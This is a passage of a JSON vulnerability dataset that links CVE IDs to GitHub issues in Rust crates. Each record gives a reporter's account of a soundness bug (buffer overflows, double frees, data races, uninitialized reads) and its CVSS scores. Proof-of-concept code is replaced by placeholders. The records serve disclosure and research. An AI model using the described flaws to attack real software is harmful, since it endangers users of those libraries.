  84924. "description": "Buffer overflow in APITAG . Hello fellow Rustacean, we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue Description URLTAG APITAG overflows the buffer when an iterator yields more items than the lower bound of APITAG . The problem is in line NUMBERTAG APITAG reserves capacity for n more elements to be inserted. This is done by comparing the length and the capacity. Since the length of the buffer is set to NUMBERTAG in line NUMBERTAG line NUMBERTAG will be always no op and the following code will overflow the buffer. Reproduction Below is an example program that exhibits undefined behavior using safe APIs of smallvec . ERRORTAG Output: APITAG Tested Environment Crate: smallvec Version NUMBERTAG OS: Ubuntu NUMBERTAG LTS Rustc version: rustc NUMBERTAG eac NUMBERTAG abb NUMBERTAG",
  84925. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  84926. "severity": "CRITICAL",
  84927. "baseScore": 9.8,
  84928. "impactScore": 5.9,
  84929. "exploitabilityScore": 3.9
  84930. },
  84931. {
  84932. "CVE_ID": "CVE-2021-29942",
  84933. "Issue_Url_old": "https://github.com/tiby312/reorder/issues/1",
  84934. "Issue_Url_new": "https://github.com/tiby312/reorder/issues/1",
  84935. "Repo_new": "tiby312/reorder",
  84936. "Issue_Created_At": "2021-02-24T19:40:04Z",
  84937. "description": "swap_index can return uninitialized memory. Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed that in APITAG , the length returned by the iterator is used to set the length of the vector: URLTAG However, as noted in the documentation for APITAG : > This function has the same safety guarantees as the Iterator::size_hint function. and then APITAG 's documentation URLTAG says: > APITAG is primarily intended to be used for optimizations such as reserving space for the elements of the iterator, but must not be trusted to e.g., omit bounds checks in unsafe code. An incorrect implementation of APITAG should not lead to memory safety violations. Here's an example of some code that will use uninitialized memory through this method: ERRORTAG",
  84938. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
  84939. "severity": "HIGH",
  84940. "baseScore": 7.3,
  84941. "impactScore": 3.4,
  84942. "exploitabilityScore": 3.9
  84943. },
  84944. {
  84945. "CVE_ID": "CVE-2020-35879",
  84946. "Issue_Url_old": "https://github.com/AtheMathmo/rulinalg/issues/201",
  84947. "Issue_Url_new": "https://github.com/athemathmo/rulinalg/issues/201",
  84948. "Repo_new": "athemathmo/rulinalg",
  84949. "Issue_Created_At": "2020-02-11T17:08:55Z",
  84950. "description": "API soundness issue in APITAG and APITAG . The current definition of APITAG and APITAG creates APITAG bounded reference from APITAG . Since the returned slice is created from a stored pointer in APITAG , it should be bounded by APITAG lifetime instead of APITAG . With the current definitions of those methods, it is possible to cause data race with safe Rust code. CODETAG",
  84951. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  84952. "severity": "CRITICAL",
  84953. "baseScore": 9.8,
  84954. "impactScore": 5.9,
  84955. "exploitabilityScore": 3.9
  84956. },
  84957. {
  84958. "CVE_ID": "CVE-2022-1434",
  84959. "Issue_Url_old": "https://github.com/github/advisory-database/issues/405",
  84960. "Issue_Url_new": "https://github.com/github/advisory-database/issues/405",
  84961. "Repo_new": "github/advisory-database",
  84962. "Issue_Created_At": "2022-06-17T11:32:26Z",
  84963. "description": "APITAG re: openssl src NUMBERTAG and NUMBERTAG release streams. Hiya lovelies dependabot is atm pestering :crab: to switch from NUMBERTAG openssl release stream to NUMBERTAG which is incorrect advice I suspect this might be an issue where dependabot is not reading the unaffected attribute? ERRORTAG The above should not have asked NUMBERTAG users to switch to NUMBERTAG a separate issue related to unaffected field perhaps? However.. But fact is that NUMBERTAG release stream was affected as well so we upgraded our patched to below: We also resolved this separate issue with this advisory as it should have flagged vulnerable NUMBERTAG ersions too So we upgraded our advisory to: APITAG In Rust :crab: we have two release streams for openssl src NUMBERTAG and NUMBERTAG APITAG NUMBERTAG users should upgrade to NUMBERTAG o APITAG NUMBERTAG users should upgrade to NUMBERTAG In crates NUMBERTAG are under NUMBERTAG and NUMBERTAG are under NUMBERTAG o is brought by APITAG which resolves this advisory We updated RUSTSEC NUMBERTAG to reflect the reality for openssl src : URLTAG This should mean that anyone either below APITAG (in NUMBERTAG release stream) or below NUMBERTAG in NUMBERTAG stream) should upgrade to either of release stream patched versions. Original issue in APITAG URLTAG",
  84964. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
  84965. "severity": "MEDIUM",
  84966. "baseScore": 5.9,
  84967. "impactScore": 3.6,
  84968. "exploitabilityScore": 2.2
  84969. },
  84970. {
  84971. "CVE_ID": "CVE-2021-29936",
  84972. "Issue_Url_old": "https://github.com/charles-r-earp/adtensor/issues/4",
  84973. "Issue_Url_new": "https://github.com/charles-r-earp/adtensor/issues/4",
  84974. "Repo_new": "charles-r-earp/adtensor",
  84975. "Issue_Created_At": "2021-01-12T04:21:14Z",
  84976. "description": "NUMBERTAG panic safety issue in APITAG for Vector / Matrix . Hello :crab: , we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue Description In the code that matches the latest release on crates.io APITAG trait implementation of APITAG on APITAG & APITAG can lead to a segmentation fault in safe Rust code. In both cases, code will panic if the input iterator i has shorter length than N . Upon panic, the program will drop partially uninitialized memory ( v ), which can lead to undefined behavior. From APITAG ERRORTAG From APITAG ERRORTAG Proof of Concept The below example exhibits a segmentation fault by only using safe Rust code with APITAG . A similar example can also be crafted with APITAG . CODETAG Program output ERRORTAG Suggested Fix It seems that the current github repo is totally different from the code that corresponds to the latest release APITAG on crates.io. We suggest to yank the affected versions on crates.io. Thank you for checking out this issue NUMBERTAG",
  84977. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  84978. "severity": "CRITICAL",
  84979. "baseScore": 9.8,
  84980. "impactScore": 5.9,
  84981. "exploitabilityScore": 3.9
  84982. },
  84983. {
  84984. "CVE_ID": "CVE-2020-35883",
  84985. "Issue_Url_old": "https://github.com/NilsIrl/MozWire/issues/14",
  84986. "Issue_Url_new": "https://github.com/nilsirl/mozwire/issues/14",
  84987. "Repo_new": "nilsirl/mozwire",
  84988. "Issue_Created_At": "2020-08-18T11:14:10Z",
  84989. "description": "hostname from server maybe trusted without check and used in file path. I tried to read through the code prior to using it, and here: URLTAG The APITAG variable is used, as far as I can tell from the source code this value comes directly from the server and there is no checks to verify that it doesn't contain something that might cause a path traversal (i.e. ../ ). I have not verified this in any way, as it was annoying to untangle the oauth things in front of it. It also feels like a very low risk vulnerability, as the software is hardcoded to go against the mozilla servers.",
  84990. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
  84991. "severity": "CRITICAL",
  84992. "baseScore": 9.1,
  84993. "impactScore": 5.2,
  84994. "exploitabilityScore": 3.9
  84995. },
  84996. {
  84997. "CVE_ID": "CVE-2021-38188",
  84998. "Issue_Url_old": "https://github.com/icedland/iced/issues/168",
  84999. "Issue_Url_new": "https://github.com/icedland/iced/issues/168",
  85000. "Repo_new": "icedland/iced",
  85001. "Issue_Created_At": "2021-05-19T04:00:03Z",
  85002. "description": "APITAG advisory for versions prior to NUMBERTAG I was running Miri on my project and saw a curious violation: ERRORTAG Per the Rust docs for ERRORTAG URLTAG : APITAG this method with an out of bounds index is undefined behavior even if the resulting reference is not used. Full code context: URLTAG It looks like this code was changed in URLTAG and no longer contains a call to ERRORTAG . I'm mostly submitting this issue as an FYI, but IMO a FILETAG should be published for versions prior to this fix to prevent undefined behavior in Rust applications consuming this library. If you agree I'd be happy to submit the advisory.",
  85003. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  85004. "severity": "CRITICAL",
  85005. "baseScore": 9.8,
  85006. "impactScore": 5.9,
  85007. "exploitabilityScore": 3.9
  85008. },
  85009. {
  85010. "CVE_ID": "CVE-2020-35907",
  85011. "Issue_Url_old": "https://github.com/rust-lang/futures-rs/issues/2091",
  85012. "Issue_Url_new": "https://github.com/rust-lang/futures-rs/issues/2091",
  85013. "Repo_new": "rust-lang/futures-rs",
  85014. "Issue_Created_At": "2020-03-03T22:32:02Z",
  85015. "description": "noop_waker_ref is unsound. Demo URLTAG which segfaults in playground: ERRORTAG APITAG returns a APITAG reference into TLS, but Waker is Sync so APITAG is Send , allowing the reference to outlive the thread it came from. It should use something more like a lazy_static.",
  85016. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  85017. "severity": "MEDIUM",
  85018. "baseScore": 5.5,
  85019. "impactScore": 3.6,
  85020. "exploitabilityScore": 1.8
  85021. },
  85022. {
  85023. "CVE_ID": "CVE-2019-16137",
  85024. "Issue_Url_old": "https://github.com/mvdnes/spin-rs/issues/65",
  85025. "Issue_Url_new": "https://github.com/mvdnes/spin-rs/issues/65",
  85026. "Repo_new": "mvdnes/spin-rs",
  85027. "Issue_Created_At": "2019-06-27T17:55:17Z",
  85028. "description": "Buggy Drop impl for APITAG and issues in APITAG . Multiple issues in the APITAG implementation. The first (and the worst) one is here: CODETAG Use of APITAG is incorrect. The compiler is free to reorder a write behind this, which could lead to two mutable refs being used at the same time (UB). It should be APITAG instead (maybe this was just a typo?). Other parts of this code use the needlessly strict APITAG ordering, but that's not a soundness issue. The second that I've found is a bug in the APITAG function: ERRORTAG The problem is that a different thread could increment the readers count on the indicated line, making the value that the CAS checks for incorrect it might fail even if there are no writers at all. For example: ERRORTAG This code panics for me, even though it there are no writers so APITAG should always succeed. To be frank, I think it would be better to simply rewrite this whole implementation. The original blog that this was implemented from uses the writers bit to allow for recursive write locking (which this crate doesn't) I see no reason not to just use some sentinel value like NUMBERTAG to indicate a writer is holding the lock.",
  85029. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  85030. "severity": "HIGH",
  85031. "baseScore": 7.5,
  85032. "impactScore": 3.6,
  85033. "exploitabilityScore": 3.9
  85034. },
  85035. {
  85036. "CVE_ID": "CVE-2021-28029",
  85037. "Issue_Url_old": "https://github.com/antonmarsden/toodee/issues/13",
  85038. "Issue_Url_new": "https://github.com/antonmarsden/toodee/issues/13",
  85039. "Repo_new": "antonmarsden/toodee",
  85040. "Issue_Created_At": "2021-02-19T06:04:42Z",
  85041. "description": "Panic Safety and soundness issue in insert_row. Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed a panic safety issue in the APITAG function: URLTAG During this part, the elements are shifted over which can potentially duplicate them. After this, for e in iter is called which can potentially panic. If this occurs, the duplicated elements can be dropped twice leading to a double free, see this example: ERRORTAG This outputs: CODETAG Secondly, the function reserves space based on the APITAG provided by APITAG . However, this trait shouldn't be trusted in unsafe code and can potentially lead to issues such as using undefined memory when it is implemented incorrectly like so: ERRORTAG This outputs: APITAG",
  85042. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  85043. "severity": "HIGH",
  85044. "baseScore": 7.5,
  85045. "impactScore": 3.6,
  85046. "exploitabilityScore": 3.9
  85047. },
  85048. {
  85049. "CVE_ID": "CVE-2021-28036",
  85050. "Issue_Url_old": "https://github.com/quinn-rs/quinn/issues/968",
  85051. "Issue_Url_new": "https://github.com/quinn-rs/quinn/issues/968",
  85052. "Repo_new": "quinn-rs/quinn",
  85053. "Issue_Created_At": "2021-01-04T21:30:40Z",
  85054. "description": "Invalid assumption about APITAG layout. It looks like we're assuming that APITAG matches the libc APITAG (same for IP NUMBERTAG for example in URLTAG However, the standard library never guaranteed this, and in fact is looking at changing this in URLTAG We should fix our usage.",
  85055. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  85056. "severity": "HIGH",
  85057. "baseScore": 7.5,
  85058. "impactScore": 3.6,
  85059. "exploitabilityScore": 3.9
  85060. },
  85061. {
  85062. "CVE_ID": "CVE-2020-36464",
  85063. "Issue_Url_old": "https://github.com/japaric/heapless/issues/181",
  85064. "Issue_Url_new": "https://github.com/japaric/heapless/issues/181",
  85065. "Repo_new": "japaric/heapless",
  85066. "Issue_Created_At": "2020-11-02T17:48:11Z",
  85067. "description": "Unsoundness in APITAG APITAG 's Clone implementation clones the entire inner Vec. If the iterator has been partially consumed, only the non consumed items should be cloned. The following code demonstrates the issue: ERRORTAG This outputs CODETAG After APITAG is popped from the iterator, cloning the iterator will still clone the \"dead\" APITAG . Only APITAG and APITAG should be cloned.",
  85068. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  85069. "severity": "HIGH",
  85070. "baseScore": 7.5,
  85071. "impactScore": 3.6,
  85072. "exploitabilityScore": 3.9
  85073. },
  85074. {
  85075. "CVE_ID": "CVE-2020-36209",
  85076. "Issue_Url_old": "https://github.com/Richard-W/late-static/issues/1",
  85077. "Issue_Url_new": "https://github.com/richard-w/late-static/issues/1",
  85078. "Repo_new": "richard-w/late-static",
  85079. "Issue_Created_At": "2020-11-10T20:58:02Z",
  85080. "description": "APITAG Currently APITAG implements Send and Sync unconditionally for all types. URLTAG This should probably only be for Sync types otherwise there is a soundness issue for multithreaded programs. It is possible to wrap a type that isn't safe to use across threads like Cell in a APITAG and then cause data races like so: ERRORTAG This outputs: APITAG APITAG found by APITAG gatech's Rust group)",
  85081. "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
  85082. "severity": "HIGH",
  85083. "baseScore": 7.0,
  85084. "impactScore": 5.9,
  85085. "exploitabilityScore": 1.0
  85086. },
  85087. {
  85088. "CVE_ID": "CVE-2020-36450",
  85089. "Issue_Url_old": "https://github.com/krl/bunch/issues/1",
  85090. "Issue_Url_new": "https://github.com/krl/bunch/issues/1",
  85091. "Repo_new": "krl/bunch",
  85092. "Issue_Created_At": "2020-11-12T12:43:54Z",
  85093. "description": "APITAG need a Sync bound on T. Hello :crab: , Currently in the Sync impl for APITAG , there is no Sync bound on T . With that, it's possible to write code that causes undefined behavior when Bunch is used from multiple threads. URLTAG Below is a small & contrived proof of concept, where a segmentation fault can occur due to data race. Running the example code below in Debug mode results in a segmentation fault. ERRORTAG I think this issue can be resolved by adding a APITAG bound to ERRORTAG . APITAG found by APITAG gatech's Rust group)",
  85094. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  85095. "severity": "HIGH",
  85096. "baseScore": 8.1,
  85097. "impactScore": 5.9,
  85098. "exploitabilityScore": 2.2
  85099. },
  85100. {
  85101. "CVE_ID": "CVE-2020-35908",
  85102. "Issue_Url_old": "https://github.com/rust-lang/futures-rs/issues/2050",
  85103. "Issue_Url_new": "https://github.com/rust-lang/futures-rs/issues/2050",
  85104. "Repo_new": "rust-lang/futures-rs",
  85105. "Issue_Created_At": "2020-01-24T23:00:47Z",
  85106. "description": "APITAG has an incorrect Sync impl. ERRORTAG switched to using Cell for interior mutability of the len and APITAG fields in APITAG but it still currently retains a Sync implementation. Since there isn't any synchronization performed when these fields are modified when calling the push method, the Sync implementation is invalid and should be dropped. It looks like this was mentioned in NUMBERTAG but was overlooked in the actual commit.",
  85107. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  85108. "severity": "MEDIUM",
  85109. "baseScore": 5.5,
  85110. "impactScore": 3.6,
  85111. "exploitabilityScore": 1.8
  85112. },
  85113. {
  85114. "CVE_ID": "CVE-2020-36447",
  85115. "Issue_Url_old": "https://github.com/purpleposeidon/v9/issues/1",
  85116. "Issue_Url_new": "https://github.com/purpleposeidon/v9/issues/1",
  85117. "Repo_new": "purpleposeidon/v9",
  85118. "Issue_Created_At": "2020-12-18T22:13:26Z",
  85119. "description": "APITAG APITAG and APITAG allow data races. Hello fellow Rustacean, we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue Description URLTAG APITAG 's Sync implementation doesn't impose Sync bound on T . This definition allows data races if APITAG is accessible through APITAG . APITAG derives Clone and Debug , and the default implementations of those traits access APITAG in such a way. Reproduction Below is an example program that exhibits undefined behavior using safe APIs of APITAG . APITAG Detail APITAG APITAG ERRORTAG Output: APITAG Tested Environment Crate NUMBERTAG ersion NUMBERTAG OS: Ubuntu NUMBERTAG LTS Rustc version: rustc NUMBERTAG eac NUMBERTAG abb NUMBERTAG APITAG APITAG",
  85120. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  85121. "severity": "HIGH",
  85122. "baseScore": 8.1,
  85123. "impactScore": 5.9,
  85124. "exploitabilityScore": 2.2
  85125. },
  85126. {
  85127. "CVE_ID": "CVE-2016-10933",
  85128. "Issue_Url_old": "https://github.com/RustAudio/rust-portaudio/issues/144",
  85129. "Issue_Url_new": "https://github.com/rustaudio/rust-portaudio/issues/144",
  85130. "Repo_new": "rustaudio/rust-portaudio",
  85131. "Issue_Created_At": "2016-08-21T10:57:05Z",
  85132. "description": "Vulnerable build script APITAG on network can make it execute arbitrary code). Build script attempts to download portaudio code through plain http and without any signature checking (because there aren't any) and then run it. URLTAG URLTAG That's of course portaudio team's fault. But it's possible to download portaudio code from git as a safer alternative \u2014 URLTAG I think, rust portaudio should use this safer way to download code.",
  85133. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
  85134. "severity": "MEDIUM",
  85135. "baseScore": 5.9,
  85136. "impactScore": 3.6,
  85137. "exploitabilityScore": 2.2
  85138. },
  85139. {
  85140. "CVE_ID": "CVE-2020-36433",
  85141. "Issue_Url_old": "https://github.com/aeplay/chunky/issues/2",
  85142. "Issue_Url_new": "https://github.com/aeplay/chunky/issues/2",
  85143. "Repo_new": "aeplay/chunky",
  85144. "Issue_Created_At": "2020-08-26T02:31:37Z",
  85145. "description": "Chunk API does not respect align requirement. URLTAG Description Chunk API does not respect the align requirement of types. Unaligned reference can be created with the API, which is an undefined behavior. Demonstration Crate: chunky Version NUMBERTAG OS: Ubuntu NUMBERTAG LTS Rust: rustc NUMBERTAG nightly (bf NUMBERTAG ERRORTAG Output: CODETAG Return Code NUMBERTAG",
  85146. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  85147. "severity": "HIGH",
  85148. "baseScore": 7.5,
  85149. "impactScore": 3.6,
  85150. "exploitabilityScore": 3.9
  85151. },
  85152. {
  85153. "CVE_ID": "CVE-2021-26305",
  85154. "Issue_Url_old": "https://github.com/hrektts/cdr-rs/issues/10",
  85155. "Issue_Url_new": "https://github.com/hrektts/cdr-rs/issues/10",
  85156. "Repo_new": "hrektts/cdr-rs",
  85157. "Issue_Created_At": "2021-01-02T22:58:43Z",
  85158. "description": "Reading uninitialized memory can cause UB ( APITAG ). Hello :crab: , we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue Description URLTAG APITAG method creates an uninitialized buffer and passes it to user provided Read implementation ( APITAG ). This is unsound, because it allows safe Rust code to exhibit an undefined behavior (read from uninitialized memory). Suggested Fix It is safe to zero initialize the newly allocated part of APITAG buffer before APITAG in order to prevent user provided Read from getting access to the old contents from the newly allocated heap memory. Thank you for checking out this issue NUMBERTAG",
  85159. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  85160. "severity": "CRITICAL",
  85161. "baseScore": 9.8,
  85162. "impactScore": 5.9,
  85163. "exploitabilityScore": 3.9
  85164. },
  85165. {
  85166. "CVE_ID": "CVE-2020-35905",
  85167. "Issue_Url_old": "https://github.com/rust-lang/futures-rs/issues/2239",
  85168. "Issue_Url_new": "https://github.com/rust-lang/futures-rs/issues/2239",
  85169. "Repo_new": "rust-lang/futures-rs",
  85170. "Issue_Created_At": "2020-10-23T08:54:50Z",
  85171. "description": "APITAG APITAG bound is unsound. Hello, we have noticed a soundness/memory safety issue in this crate which allows safe Rust code to trigger undefined behavior while scanning crates.io. URLTAG Description APITAG implementation for APITAG only considers variance on T, while APITAG dereferences to U. This can lead to data race in safe Rust code when a closure used in APITAG returns U that is unrelated to T. Demonstration Crate: futures Version NUMBERTAG OS: Ubuntu NUMBERTAG LTS Rust: rustc NUMBERTAG bf6b4f NUMBERTAG ERRORTAG Output: CODETAG Return Code NUMBERTAG",
  85172. "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
  85173. "severity": "MEDIUM",
  85174. "baseScore": 4.7,
  85175. "impactScore": 3.6,
  85176. "exploitabilityScore": 1.0
  85177. },
  85178. {
  85179. "CVE_ID": "CVE-2021-28034",
  85180. "Issue_Url_old": "https://github.com/thepowersgang/stack_dst-rs/issues/5",
  85181. "Issue_Url_new": "https://github.com/thepowersgang/stack_dst-rs/issues/5",
  85182. "Repo_new": "thepowersgang/stack_dst-rs",
  85183. "Issue_Created_At": "2021-02-22T18:15:33Z",
  85184. "description": "push_cloned may drop uninitialized or double free if clone panics.. Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed a panic safety issue in the APITAG function: URLTAG The APITAG function increases the length of the stack, but between the element being written and this increased length the APITAG function is called which can leave the stack in a longer state but missing an element. Here's a simple demonstration of this issue: ERRORTAG This outputs: CODETAG Notice that APITAG is printed twice, indicating a double free.",
  85185. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  85186. "severity": "CRITICAL",
  85187. "baseScore": 9.8,
  85188. "impactScore": 5.9,
  85189. "exploitabilityScore": 3.9
  85190. },
  85191. {
  85192. "CVE_ID": "CVE-2021-26955",
  85193. "Issue_Url_old": "https://github.com/RustSec/advisory-db/issues/653",
  85194. "Issue_Url_new": "https://github.com/rustsec/advisory-db/issues/653",
  85195. "Repo_new": "rustsec/advisory-db",
  85196. "Issue_Created_At": "2021-01-23T16:27:12Z",
  85197. "description": "xcb is unsound and unmaintained. Following up from URLTAG the following issues are currently outstanding in the xcb crate: interpret some bytes coming from the NUMBERTAG server as any type you like: rtbo/rust xcb NUMBERTAG URLTAG Out of bounds read for sending bytes to the server: rtbo/rust xcb NUMBERTAG URLTAG a \"safe\" version of APITAG (with some limits on the types, but not enough): rtbo/rust xcb NUMBERTAG URLTAG The README states: > Maintainance request > > I've been very happy to work on this project, but I don't have the possibility anymore to maintain these bindings to the level the Rust community deserves. I can't spend as much time on it as I used to, and I'm not using neither Rust nor XCB anymore, so I clearly can't improve the bindings with the latest Rust features. Person with motivation and good knowledge of Rust and XCB may contact me per email.",
  85198. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  85199. "severity": "CRITICAL",
  85200. "baseScore": 9.8,
  85201. "impactScore": 5.9,
  85202. "exploitabilityScore": 3.9
  85203. },
  85204. {
  85205. "CVE_ID": "CVE-2021-26955",
  85206. "Issue_Url_old": "https://github.com/rust-x-bindings/rust-xcb/issues/78",
  85207. "Issue_Url_new": "https://github.com/rust-x-bindings/rust-xcb/issues/78",
  85208. "Repo_new": "rust-x-bindings/rust-xcb",
  85209. "Issue_Created_At": "2020-04-11T02:22:44Z",
  85210. "description": "Make APITAG unsafe. ERRORTAG This is the code for APITAG . Safe functions should (almost?) always be safe, no matter their arguments. My suggested fix is to change it to ERRORTAG This signals to callers that they have to be careful when calling cast_event.",
  85211. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  85212. "severity": "CRITICAL",
  85213. "baseScore": 9.8,
  85214. "impactScore": 5.9,
  85215. "exploitabilityScore": 3.9
  85216. },
  85217. {
  85218. "CVE_ID": "CVE-2021-26955",
  85219. "Issue_Url_old": "https://github.com/rust-x-bindings/rust-xcb/issues/94",
  85220. "Issue_Url_new": "https://github.com/rust-x-bindings/rust-xcb/issues/94",
  85221. "Repo_new": "rust-x-bindings/rust-xcb",
  85222. "Issue_Created_At": "2020-12-21T20:51:55Z",
  85223. "description": "Undefined behaviour in xproto::change_property. APITAG takes the arguments APITAG and a APITAG . The currently generated code ERRORTAG does not check for the case APITAG , so a user could do something like this: APITAG APITAG will assume to get NUMBERTAG bits of data in APITAG , but instead gets only NUMBERTAG bits. Reading the last NUMBERTAG bytes from APITAG would cause UB. Also it is not desirable to get types, that are bigger than format . We could make APITAG unsafe or APITAG in the case of APITAG . Another option would be to only allow APITAG , APITAG and APITAG , since other formats are not allowed by APITAG . ERRORTAG",
  85224. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  85225. "severity": "CRITICAL",
  85226. "baseScore": 9.8,
  85227. "impactScore": 5.9,
  85228. "exploitabilityScore": 3.9
  85229. },
  85230. {
  85231. "CVE_ID": "CVE-2021-26955",
  85232. "Issue_Url_old": "https://github.com/rust-x-bindings/rust-xcb/issues/95",
  85233. "Issue_Url_new": "https://github.com/rust-x-bindings/rust-xcb/issues/95",
  85234. "Repo_new": "rust-x-bindings/rust-xcb",
  85235. "Issue_Created_At": "2021-01-23T06:39:05Z",
  85236. "description": "APITAG is unsound. The below is pure unsoundness. The caller can specify any type they like. How about bool or an enum? Or something with a pointer like Vec or String or APITAG for extra memory fun? Edit: To explain this some more: A bool is either NUMBERTAG or NUMBERTAG If a variable of type bool contains any other value, that's undefined behaviour aka \"that must not happen\". ERRORTAG",
  85237. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  85238. "severity": "CRITICAL",
  85239. "baseScore": 9.8,
  85240. "impactScore": 5.9,
  85241. "exploitabilityScore": 3.9
  85242. },
  85243. {
  85244. "CVE_ID": "CVE-2021-26955",
  85245. "Issue_Url_old": "https://github.com/rust-x-bindings/rust-xcb/issues/96",
  85246. "Issue_Url_new": "https://github.com/rust-x-bindings/rust-xcb/issues/96",
  85247. "Repo_new": "rust-x-bindings/rust-xcb",
  85248. "Issue_Created_At": "2021-01-23T09:10:43Z",
  85249. "description": "Creates a string from unvalidated utf8. I have no words: ERRORTAG",
  85250. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  85251. "severity": "CRITICAL",
  85252. "baseScore": 9.8,
  85253. "impactScore": 5.9,
  85254. "exploitabilityScore": 3.9
  85255. },
  85256. {
  85257. "CVE_ID": "CVE-2020-36469",
  85258. "Issue_Url_old": "https://github.com/krl/appendix/issues/6",
  85259. "Issue_Url_new": "https://github.com/krl/appendix/issues/6",
  85260. "Repo_new": "krl/appendix",
  85261. "Issue_Created_At": "2020-11-15T05:31:26Z",
  85262. "description": "Index should have its Send and Sync traits be bounded.. Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed that the Index object implements the Send and Sync traits for all types: URLTAG This should likely be bounded when both K and V are Send and Sync respectively, otherwise it makes it possible to send an Index object across threads containing non Sendable types such as an Rc object or a Cell .",
  85263. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
  85264. "severity": "MEDIUM",
  85265. "baseScore": 5.9,
  85266. "impactScore": 3.6,
  85267. "exploitabilityScore": 2.2
  85268. },
  85269. {
  85270. "CVE_ID": "CVE-2021-29934",
  85271. "Issue_Url_old": "https://github.com/uutils/coreutils/issues/1729",
  85272. "Issue_Url_new": "https://github.com/uutils/coreutils/issues/1729",
  85273. "Repo_new": "uutils/coreutils",
  85274. "Issue_Created_At": "2021-02-18T01:57:22Z",
  85275. "description": "Read on uninitialized buffer may cause UB ('uu_od' crate). Hello :crab:, we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue Description URLTAG APITAG method creates an uninitialized buffer and passes it to user provided Read implementation. This is unsound, because it allows safe Rust code to exhibit an undefined behavior (read from uninitialized memory). FILETAG from the Read trait documentation explains the issue: > It is your responsibility to make sure that buf is initialized before calling read . Calling read with an uninitialized buf (of the kind one obtains via ERRORTAG ) is not safe, and can lead to undefined behavior. How to fix the issue? The Naive & safe way to fix the issue is to always zero initialize a buffer before lending it to a user provided Read implementation. Note that this approach will add runtime performance overhead of zero initializing the buffer. As of Feb NUMBERTAG there is not yet an ideal fix that works with no performance overhead. Below are links to relevant discussions & suggestions for the fix. Rust RFC NUMBERTAG URLTAG Discussion in Rust Internals Forum URLTAG",
  85276. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
  85277. "severity": "HIGH",
  85278. "baseScore": 7.3,
  85279. "impactScore": 3.4,
  85280. "exploitabilityScore": 3.9
  85281. },
  85282. {
  85283. "CVE_ID": "CVE-2021-28030",
  85284. "Issue_Url_old": "https://github.com/bodoni/truetype/issues/11",
  85285. "Issue_Url_new": "https://github.com/bodoni/truetype/issues/11",
  85286. "Repo_new": "bodoni/truetype",
  85287. "Issue_Created_At": "2021-02-17T20:07:48Z",
